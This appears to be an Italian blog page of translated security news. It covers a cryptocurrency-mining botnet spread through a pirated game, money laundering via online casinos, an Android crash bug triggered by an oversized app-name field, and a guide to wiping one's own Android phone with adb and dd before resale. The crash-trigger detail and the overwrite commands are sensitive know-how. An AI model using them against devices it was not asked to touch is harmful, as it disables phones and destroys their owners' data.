Avrebbero potuto effettuare il mining di qualcos’altro: monete basate su Scrypt come Litecoin, o forse persino di X11, se l’avessero fatto, gli utenti, probabilmente, non avrebbero nemmeno notato eventuali framedrop, o le ventole delle loro GPU che giravano alla massima velocità.

Sono sinceramente sorpreso di non vedere più botnet basate sul mining di cryptocurrency, credo soltanto che non sia ancora convenzionale. E, al giorno d’oggi, hai bisogno di una buona esca per convincere così tante persone a installare malware (e superare il loro software anti-virus).

Altro motivo per cui i giocatori diventano un buon obiettivo in quanto, spesso, non usano nemmeno software AV, o lo disattivano per il massimo delle prestazioni.

Fonte: The Register

Fonte: Pirated ‘Watch Dogs’ Game Made A Bitcoin Mining Botnet


Posted in Darknet, Traduzioni inglese-italiano and tagged , , , by with no comments yet.

Denaro riciclato tramite siti di gioco d’azzardo online

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di DFI News

Un nuovo report di McAfee mette in luce il mondo sotterraneo del gioco d’azzardo online: identifica la proliferazione dei casinò online, un settore destinato a crescere di quasi il 30 per cento nei prossimi tre anni e come il loro utilizzo stia alimentando la criminalità informatica, facilitando il “fare soldi” tramite attività illegali.

Il gioco d’azzardo online comporta enormi volumi di transazioni e flussi di cassa che possono offuscare e mascherare il riciclaggio di denaro. I giocatori non hanno a che fare con un prodotto fisico tangibile; la valuta fisica non cambia mani. Di conseguenza, i proventi illegali possono essere riciclati piazzandoli come scommesse a un capo della transazione e ricevendo i payout come vincite all’altro capo.

Inoltre le vincite del gioco d’azzardo sono esentasse in molte giurisdizioni e questo rende le segnalazioni ufficiali ai governi impraticabili e le autorità spesso incapaci di monitorare le transazioni.

I siti di gioco d’azzardo online facilitano il riciclaggio di denaro, mentre il numero di siti non autorizzati è oltre dieci volte superiore a quello degli operatori autorizzati. Questa tendenza, combinata ai molti siti che operano nel Dark Web che sfruttano le valute virtuali, mostra l’entità della sfida per le forze dell’ordine.

Continua la lettura.

Fonte: Help Net Security

Fonte: Money Laundered through Online Gambling Sites


Posted in DFI News, Traduzioni inglese-italiano and tagged , , by with no comments yet.

App dannose possono rendere inutilizzabili i telefoni Android

Il post seguente è stato tradotto grazie all’esplicita autorizzazione di DFI News

Alcuni ricercatori dicono d’aver scoperto bug nel sistema operativo Android di Google che potrebbero consentire ad app dannose d’innescare, nei dispositivi vulnerabili, una spirale senza fine di crash in loop ed eventualmente eliminare tutti i dati memorizzati.

Il ricercatore Ibrahim Balic ha scritto in un post che le app sfruttano la vulnerabilità denial-of-service di Android 2.3, 4.2.2, 4.3 e probabilmente molte altre versioni del sistema operativo. Gli autori dell’attacco potrebbero sfruttare il sottostante bug di danneggiamento della memoria, offuscando il codice d’attacco in un’app di diversa utilità, o legittima, programmata per essere attivata solamente dopo essere stata installata su una strumentazione vulnerabile. Compilando il campo Android “nomeapp” con un valore estremamente superiore a 387.000 caratteri, l’app può permettere al dispositivo d’iniziare una serie infinita di crash.

Continua la lettura

Fonte: Ars Technica

Fonte: Malicious Apps Can Make Android Phones Useless


Posted in DFI News, Traduzioni inglese-italiano and tagged by with no comments yet.

Guida alla cancellazione sicura dei dispositivi Android per il venditore super paranoide.

Il post seguente è stato tradotto per gentile concessione di Zackery Fretty

Uno qualunque dei miei amici direbbe che sono un pazzo paranoide per quanto riguarda gli utenti malintenzionati, soprattutto quando si tratta di vendere la mia vecchia elettronica. Sono il tipo di ragazzo che preferisce mettere una pietra sopra al vecchio dispositivo. Purtroppo sono anche il tipo che ama comprare i nuovi Nexus non appena escono, quindi preferisco vendere i miei vecchi dispositivi per finanziare i miei nuovi acquisti. Per poterlo fare ho dovuto trovare un modo per sentirmi tranquillo. Ora so che un modo davvero semplice è abilitare la crittografia e poi formattare. Per qualche ragione quando ho venduto il mio HTC One X la cifratura non ha funzionato e la scheda SD non era rimovibile, quindi avevo bisogno di trovare un modo per tranquillizzarmi e vendere il dispositivo, ecco perché sono giunto a questa soluzione.

Non sono sicuro al 100% ma credo che potrebbe essere necessario aver installato BusyBox/Root, o semplicemente utilizzare Android SDK (che sarà utile in seguito); ma presumo che chiunque sappia che il Ripristino dati di fabbrica del vostro dispositivo in realtà non rimuove nessun dato, sia lo stesso tipo di persona che effettuerebbe il rooting dei dispositivi Android.

Anche solo come nota a margine, non sto dicendo che questa sia la cosa più sicura al mondo; ma è quello che faccio io e che mi fa sentire abbastanza tranquillo. Ho verificato usando Recuva in modalità d’analisi profonda e non sono stato in grado di recuperare i dati da /sdcard; in ogni caso, non ho modo di confermare per la partizione /data. Sto solo ipotizzando che funzioni altrettanto bene come per la scheda SD interna.

Questo processo comprende essenzialmente due fasi

  1. Formattazione memoria
  2. Zeroing /sdcard e /data

Quindi, iniziamo…

Fase 1 – Formattazione memoria

Operazione piuttosto semplice e quando si acquista un telefono usato online, è probabile che l’altro utente abbia protetto i dati; il che, vi assicuro, non è granché. Tutto questo per dire al sistema operativo che dove una volta erano presenti i vostri dati, ora sono “scrivibili”, in modo che il sistema operativo possa scrivervi ancora. Se doveste usare uno strumento come Recuva dopo l’esecuzione del Ripristino dati di fabbrica, sarete in grado di recuperare gran parte dei file. Questo non riguarda solo Android: si applica a tutti i supporti per l’archiviazione, anche se non tanto ai media con Flash come i dischi rigidi. La ragione per cui ho usato questo come punto di partenza è informare l’SO che tutto è “disponibile” per la scrittura, che è ciò che vogliamo. Per fare questo è possibile utilizzare il recupero, o andare su Impostazioni> Backup e Ripristino> Ripristino dati di fabbrica e lasciare che l’SO faccia il suo dovere .

Fase 2 – Zeroing /sdcard e /data

Ora che abbiamo reso scrivibili tutti i dati sul dispositivo, è il momento di iniziare l’”azzeramento”. Ciò significa, essenzialmente, scrivere degli 0 sui dati che abbiamo precedentemente contrassegnato come “scrivibili”. Se qualcuno tentasse di ripristinare i dati, recupererebbe degli 0 e non i vostri dati personali. Sugli HDD più vecchi sarebbe una buona idea farlo più volte ma molti esperti hanno suggerito che un solo passaggio è sufficiente nei media con flash.

La prima cosa che vorrete fare è lanciare l’SDK di Android utilizzando la riga di comando e passare alla cartella platform-tools dove troverete fastboot e adb . Si trova in /androidsdk/platform-tools.

Quando sarete negli strumenti della piattaforma eseguite il seguente comando:

./adb devices

Se otterrete una schermata con un numero di serie siete a posto: significa che il computer riesce a leggere il telefono. Se non otterrete nulla, andate in impostazioni per sviluppatori e abilitate Debug USB

Quando il telefono e l’SDK comunicheranno, digitate il seguente comando per accedere alla shell del dispositivo:

./adb shell

Dovreste avere un bash, come mostrato nell’immagine sotto :

Screen Shot 2013-02-16 at 1.10.14 PM

Non appena sarete nella riga di comando del vostro telefono, eseguite il seguente comando:

dd if=/dev/urandom of=/sdcard/junkfile

Non otterrete risposta per un po’: in sostanza, verrà creato un file pieno di dati casuali sulla scheda SD del vostro telefono fino a quando non sarà completamente piena; a quel punto si fermerà. Potrete verificare andando in Impostazioni> Memoria e guardando la % libera sulla scheda SD che continua a diminuire.

Quando il processo sarà completato, dovreste avere un messaggio simile al seguente, che descrive la quantità di spazio scritto. Dovrebbe essere pari alla dimensione della vostra scheda SD.

Screen Shot 2013-02-16 at 5.01.55 PM

Una volta che il processo sarà completo, proveremo a ripetere la stessa riga, con una leggera modifica, come segue:

dd if=/dev/urandom of=/data/junkfile

Questo creerà un altro junk file sul vostro dispositivo con dati casuali, ma non sarà in /sdcard, bensì in /data. /data, dove sono memorizzate tutte le impostazioni delle vostre varie app. Per verificare che questo processo fosse ancora in esecuzione, ho aperto una nuova finestra del terminale e ho usato la shell ./adb per eseguire ls -all -h per guardare la dimensione del file che continuava a crescere, come illustrato di seguito:

Screen Shot 2013-02-16 at 4.59.52 PM

Potrete vedere la dimensione del “junkfile” andare da 600MB a 1.5GB. Una volta che la cartella /data sarà completamente piena, non solo otterrete una conferma sulla shell ma il vostro dispositivo Android dovrebbe mandarvi un messaggio nella finestra di notifica che la partizione dati è piena e che le funzioni di sistema potrebbero essere compromesse, per una volta questo è bene!

Quindi, a questo punto, avrete correttamente saturato le vostre cartelle /data e /sdcard, le due principali aree in cui le informazioni personali sono memorizzate su Android, con un mucchio di dati casuali.

Il passo successivo, e finale, del processo è quello di tornare semplicemente al punto 1 e fare Ripristino dati di fabbrica per l’ultima volta. Questo marcherà i dati come “scrivibili” e regalerà al nuovo proprietario del vostro dispositivo un’esperienza da “nuovo telefono”. Non è necessario, suppongo, ma immagino che l’acquirente del telefono non prenderebbe troppo bene il fatto di trovare, all’accensione, un telefono pieno di messaggi di errore. ;)

Non sono esperto, però, come ho detto prima, usando software di recupero non sono stato in grado di recuperare i dati dal mio HTC One X, quando l’ho venduto; quindi direi che questo metodo è piuttosto comodo per ripulire il dispositivo del 99,9% degli utenti là fuori.

Un po’ sopra le righe? Sicuramente. Esattamente come piace a me!

Fonte: Secure Erasing Android Devices Guide for the Super Paranoid Seller


Posted in Traduzioni inglese-italiano, Zackery Fretty and tagged , , by with no comments yet.